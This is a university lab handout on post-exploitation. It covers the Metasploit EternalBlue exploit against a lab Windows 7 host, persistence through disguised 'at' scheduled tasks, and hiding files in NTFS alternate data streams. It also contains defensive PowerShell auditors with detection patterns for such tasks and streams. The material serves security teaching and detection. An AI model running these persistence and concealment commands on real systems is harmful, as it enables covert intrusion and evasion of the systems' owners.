CSCB524 - CCSB4113 - Chapter 8 Lab 8

The document discusses techniques for maintaining persistence after compromising a system, including creating scheduled tasks to execute programs periodically, creating custom daemon processes, establishing additional backdoors, creating new users, and implementing reverse and bind shells. It provides examples of using the Windows 'at' command to schedule a task to write system information to a hidden file stored within an alternate data stream of another file. This disguises the hidden file's existence and allows executing it through the parent file, demonstrating how an attacker could covertly maintain access to the system.

Performing Post-Exploitation Techniques

CHAPTER 8 LAB 8

CSCB524/CCSB4113 1
MAINTAINING PERSISTENCE AFTER COMPROMISING A SYSTEM

Ways to Maintain Persistence on a Compromised System
I. Creating and manipulating scheduled jobs and tasks
II. Creating custom daemons and processes
III. Creating additional back doors
IV. Creating new users
V. Creating reverse and bind shells

Scheduled Tasks (at)
C:\>at \\VICTIM 8:17pm /every:M,W,F User_Feed_Synchronization.exe

• Windows command-line program to schedule tasks
  – The task looks like a benign program that updates a user feed, but it may actually be a reverse call-back to the attacking platform used to maintain persistence
• Task Scheduler is the GUI version of the program

Kali (10.0.2.37) vs Windows 7 (10.0.2.38)

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options
msf exploit(ms17_010_eternalblue) > set RHOST 10.0.2.38
msf exploit(ms17_010_eternalblue) > run

[Screenshot: Metasploit output, with the Windows 7 IP address highlighted]
Standard shell response, not a Meterpreter payload

C:\Windows\system32> time

Press ENTER at the "Enter the new time:" prompt to keep the current time

C:\Windows\system32> at 09:15 /every:Wednesday cmd /c "systeminfo > c:\info.txt"

C:\Windows\system32> at
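A defender's counterpart to the two slides above, added here as an example (it is not code from the lab): audit the scheduled tasks on a Windows host and flag actions that match the pattern the lab demonstrates (at.exe jobs, cmd /c wrappers, programs outside the Windows and Program Files trees, and references that look like alternate data streams). The function names Test-TaskAction and Get-SuspiciousTasks and the sample rows are this example's own assumptions; the live audit relies only on schtasks.exe, which exists on Windows 7.

```powershell
# Added example for this lab (not code from the slides): audit scheduled tasks on a Windows
# host and flag actions that match the persistence pattern shown above. It uses schtasks.exe
# so it also works on Windows 7, which lacks the ScheduledTasks module (Get-ScheduledTask).
# Jobs created with at.exe appear as tasks named At1, At2, ... under %SystemRoot%\Tasks.
# Function names and the sample rows below are this example's own, not the lab's.

$TrustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\") |
    Where-Object { $_ -ne '\' }    # ProgramFiles(x86) is unset on 32-bit hosts

function Test-TaskAction {
    # Returns the reasons a task action looks suspicious (nothing returned = nothing flagged).
    param([string]$TaskName, [string]$TaskToRun)
    $reasons = @()
    if ($TaskName -match '\\At\d+$') { $reasons += 'created with at.exe' }
    if ($TaskToRun -match '(?i)\bcmd(\.exe)?\s+/c\b') { $reasons += 'cmd /c wrapper' }
    if ($TaskToRun -match '(?i)\b(powershell|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?\b') {
        $reasons += 'script or proxy host'
    }
    # A colon that is neither a drive letter (X:\) nor part of a URL (://) suggests an
    # alternate data stream target such as hello.txt:info.txt, which this lab uses later.
    if (($TaskToRun -replace '\b[A-Za-z]:\\', '') -match '[^\s"<>|:]+:(?!//)[^\s"<>|\\:]+') {
        $reasons += 'possible alternate data stream reference'
    }
    # The first token is the program; flag it when it lives outside Windows / Program Files.
    if ($TaskToRun -match '^\s*(?:"(?<q>[^"]+)"|(?<u>\S+))') {
        $exe = if ($Matches['q']) { $Matches['q'] } else { $Matches['u'] }
        if ($exe -match '^[A-Za-z]:\\' -and
            -not ($TrustedRoots | Where-Object { $exe.StartsWith($_, [StringComparison]::OrdinalIgnoreCase) })) {
            $reasons += "program outside trusted roots ($exe)"
        }
    }
    $reasons
}

function Get-SuspiciousTasks {
    # schtasks repeats its CSV header row for every task folder; drop those pseudo-rows.
    schtasks /query /fo CSV /v 2>$null | ConvertFrom-Csv |
        Where-Object { $_.TaskName -ne 'TaskName' } |
        ForEach-Object {
            $reasons = @(Test-TaskAction -TaskName $_.TaskName -TaskToRun $_.'Task To Run')
            if ($reasons.Count -gt 0) {
                [pscustomobject]@{
                    TaskName  = $_.TaskName
                    RunAsUser = $_.'Run As User'
                    Schedule  = $_.'Schedule Type'
                    TaskToRun = $_.'Task To Run'
                    Reasons   = $reasons -join '; '
                }
            }
        }
}

# Constructed sample actions (not real schtasks output) mirroring the lab's commands, plus a
# typical benign Windows task, so the scoring can be read without running schtasks.
$Samples = @(
    @{ TaskName = '\At1';    TaskToRun = 'cmd /c "systeminfo > c:\info.txt"' },
    @{ TaskName = '\At2';    TaskToRun = 'C:\Users\Test\User_Feed_Synchronization.exe' },
    @{ TaskName = '\Update'; TaskToRun = 'C:\hello.txt:info.txt' },
    @{ TaskName = '\Microsoft\Windows\Defrag\ScheduledDefrag'; TaskToRun = '%windir%\system32\defrag.exe -c' }
)
foreach ($s in $Samples) {
    $hits = @(Test-TaskAction @s) -join '; '
    if (-not $hits) { $hits = 'nothing flagged' }
    '{0,-45} -> {1}' -f $s.TaskName, $hits
}

# Live audit of this host (run from an elevated prompt to see every user's tasks):
Get-SuspiciousTasks | Format-Table -AutoSize -Wrap
```

The four constructed rows show the scoring: the first is flagged as an at.exe job with a cmd /c wrapper, the second for running a program from a user profile, the third for the stream-style path, and the defrag task is not flagged. The heuristics are review hints rather than verdicts; a task that is flagged still has to be compared against what the host's owner installed.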

• This shows the capability of being able to run any program we want:
  – Pinging back
  – Password sniffers
  – Key loggers
COVERING TRACKS

Erase, Modify or Disable the Evidence
• Remove any unneeded files or tools that were added to the victim's machine
• Hide other files and resources in hidden or uncommon locations
  – Linux, Unix, OS X
    • Create a folder whose name begins with a dot (.)
  – Windows
    • Hide files in the System32 or User folders
    • Apply the hidden attribute
    • Use Alternate Data Streams
C:\>type c:\info.txt > hello.txt:info.txt
C:\>start notepad hello.txt:info.txt

• Create a blank text file
C:\Windows\system32> cd \
C:\>type nul > hello.txt

• Check the file size
C:\>dir

• Hide info.txt inside hello.txt
C:\>type c:\info.txt > hello.txt:info.txt

• Check the file size again (it has not changed)
C:\>dir

• Delete info.txt
C:\>del info.txt

• In Windows 7, open hello.txt

• In Windows 7, open cmd
C:\Users\Test>cd \
C:\>start notepad hello.txt:info.txt

Why is this useful to us?
• Instead of hiding a text file, an attacker could hide malware in the same way and then launch it with the 'at' program
• The hidden file does not appear in ordinary directory listings because it lives in an alternate data stream

Alternate Data Streams (ADS)
• Alternate Data Streams (ADS) are a feature found only on the NTFS file system
• They allow file data to be forked into existing files without affecting those files' functionality, size, or display in traditional file-browsing utilities such as dir or Windows Explorer
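The lab's hidden stream is invisible to a plain "dir", but NTFS still records it, and both "dir /R" (Windows Vista and later) and Get-Item -Stream (PowerShell 3.0 and later) list it. The following added example (not code from the slides) finds alternate data streams under a path, then recreates the lab's hello.txt:info.txt in a temporary folder to show the difference between the plain listing and the stream-aware checks. The function name Get-AlternateStreams and the sample stream content are this example's own assumptions.

```powershell
# Added example for this lab (not code from the slides): find alternate data streams on a
# volume. Requires PowerShell 3.0 or later for Get-Item -Stream (on Windows 7 that means
# installing WMF 3.0; "dir /R" from cmd works without it).

function Get-AlternateStreams {
    # Returns one object per non-default stream under $Path. Zone.Identifier is the normal
    # "downloaded from the Internet" mark, so it is labelled rather than treated as hidden data.
    param([string]$Path, [switch]$Recurse)
    Get-ChildItem -LiteralPath $Path -File -Force -Recurse:$Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |     # ':$DATA' is the file's normal content
                ForEach-Object {
                    [pscustomobject]@{
                        File   = $file.FullName
                        Stream = $_.Stream
                        Bytes  = $_.Length
                        Note   = if ($_.Stream -eq 'Zone.Identifier') { 'download mark (expected)' } else { 'REVIEW' }
                    }
                }
        }
}

# Constructed demonstration in a temporary folder: rebuild the lab's hello.txt:info.txt,
# show that it is missing from a plain listing, then find it and read it back for triage.
$Lab = Join-Path $env:TEMP ('ads-demo-' + [guid]::NewGuid())
New-Item -ItemType Directory -Path $Lab | Out-Null
$Hello = Join-Path $Lab 'hello.txt'
New-Item -ItemType File -Path $Hello | Out-Null                                  # type nul > hello.txt
Set-Content -LiteralPath $Hello -Stream 'info.txt' -Value 'constructed sample systeminfo output'

'--- plain listing: hello.txt only, 0 bytes ---'
cmd /c dir $Lab
'--- dir /R lists the stream ---'
cmd /c dir /R $Lab
'--- Get-AlternateStreams ---'
Get-AlternateStreams -Path $Lab | Format-Table -AutoSize
'--- stream content for triage ---'
Get-Content -LiteralPath $Hello -Stream 'info.txt'

Remove-Item -LiteralPath $Lab -Recurse -Force    # clean up the demonstration folder
```

For a real sweep, point the function at user-writable locations first, for example Get-AlternateStreams -Path C:\Users -Recurse and Get-AlternateStreams -Path C:\ (non-recursive, which covers the lab's C:\hello.txt). Expect many Zone.Identifier entries on any machine that downloads files; the REVIEW rows are the ones worth opening with Get-Content -Stream.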

Department of Computing
College of Computing and Informatics
Universiti Tenaga Nasional
